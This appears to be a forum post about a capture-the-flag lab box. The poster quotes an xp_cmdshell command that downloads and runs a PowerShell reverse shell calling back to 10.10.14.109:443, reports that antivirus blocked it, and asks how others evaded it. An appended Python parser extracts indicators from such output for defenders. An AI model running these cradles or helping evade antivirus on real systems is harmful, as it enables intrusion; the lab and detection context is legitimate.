I have rooted the box, but not without first running into a situation where antivirus blocked the PowerShell one-liner I initially chose for the reverse shell (the PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok on GitHub). My one-liner looked very similar to the one in the walkthrough (which I eventually used successfully).
Just curious if anyone ran into the same thing and how you got past this roadblock. I tried tweaking the variable names in my script and also tried generating completely different payloads through msfvenom, but had no success.
I’m also not sure why a box that could require antivirus evasion is marked as an easy box.
1> xp_cmdshell "powershell IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.109/rshell.ps1');"
2> go
output: IEX : At line:1 char:1
output: + $c = New-Object System.Net.Sockets.TCPClient("10.10.14.109",443);$s = ...
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: This script contains malicious content and has been blocked by your antivirus software.
output: At line:1 char:1
output: + IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14 ...
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: + CategoryInfo : ParserError: ( [Invoke-Expression], ParseException
output: + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
output:
output: NULL
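From the defender's side, the session above is a useful artifact: SQL Server's `xp_cmdshell` launching PowerShell with an `IEX ... DownloadString` cradle, and AMSI refusing the fetched script with `FullyQualifiedErrorId : ScriptContainedMaliciousContent`. The following is an added example (not part of the original post) that parses exactly this kind of captured output, pulls out the stager URL and the reverse-shell callback host/port as indicators, and records whether the attempt was blocked or went through. The sample text is constructed from the output quoted in the post; the function and field names are my own.

```python
import re

# Constructed sample: the xp_cmdshell session quoted in the post above.
SAMPLE_OUTPUT = """\
1> xp_cmdshell "powershell IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.109/rshell.ps1');"
2> go
output: IEX : At line:1 char:1
output: + $c = New-Object System.Net.Sockets.TCPClient("10.10.14.109",443);$s = ...
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: This script contains malicious content and has been blocked by your antivirus software.
output: At line:1 char:1
output: + IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14 ...
output: + CategoryInfo : ParserError: ( [Invoke-Expression], ParseException
output: + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
output:
output: NULL
"""

# The error id PowerShell reports when AMSI blocks content passed to Invoke-Expression.
AMSI_BLOCK_ID = "ScriptContainedMaliciousContent"

URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s'\"\)]*")
SOCKET_RE = re.compile(r'TCPClient\("?([\d.]+)"?,\s*(\d+)\)')
ERROR_ID_RE = re.compile(r"FullyQualifiedErrorId\s*:\s*([A-Za-z]+)")


def parse_xp_cmdshell_session(text):
    """Walk a captured xp_cmdshell/PowerShell transcript line by line and
    collect the indicators a responder cares about."""
    finding = {
        "invoked_via_xp_cmdshell": False,  # command came through SQL Server
        "uses_download_cradle": False,     # IEX + DownloadString pattern
        "amsi_blocked": False,             # AMSI refused the fetched script
        "error_id": None,
        "stager_url": None,                # where the script was fetched from
        "callback_host": None,             # reverse-shell destination, if visible
        "callback_port": None,
    }
    for raw in text.splitlines():
        line = raw.strip()
        lowered = line.lower()
        if "xp_cmdshell" in lowered:
            finding["invoked_via_xp_cmdshell"] = True
        if "iex" in lowered and "downloadstring" in lowered:
            finding["uses_download_cradle"] = True
        m = URL_RE.search(line)
        if m and finding["stager_url"] is None:
            # keep the first complete URL; truncated echoes ("10.10.14 ...") do not match
            finding["stager_url"] = m.group(0)
        m = SOCKET_RE.search(line)
        if m:
            finding["callback_host"] = m.group(1)
            finding["callback_port"] = int(m.group(2))
        m = ERROR_ID_RE.search(line)
        if m:
            finding["error_id"] = m.group(1)
            finding["amsi_blocked"] = m.group(1) == AMSI_BLOCK_ID
    return finding


def classify(finding):
    """Triage label: a blocked cradle still proves code execution via xp_cmdshell,
    an unblocked one means a live reverse shell is likely."""
    if finding["amsi_blocked"]:
        return "blocked_attempt"
    if finding["uses_download_cradle"] or finding["callback_host"]:
        return "likely_successful_cradle"
    return "no_cradle_observed"


if __name__ == "__main__":
    result = parse_xp_cmdshell_session(SAMPLE_OUTPUT)
    print(classify(result), result)
```

Even a blocked attempt like this one is worth alerting on: the `xp_cmdshell` line shows the attacker already had command execution on the SQL Server host, and the extracted URL and socket tuple give you the addresses to block and hunt for in proxy and firewall logs.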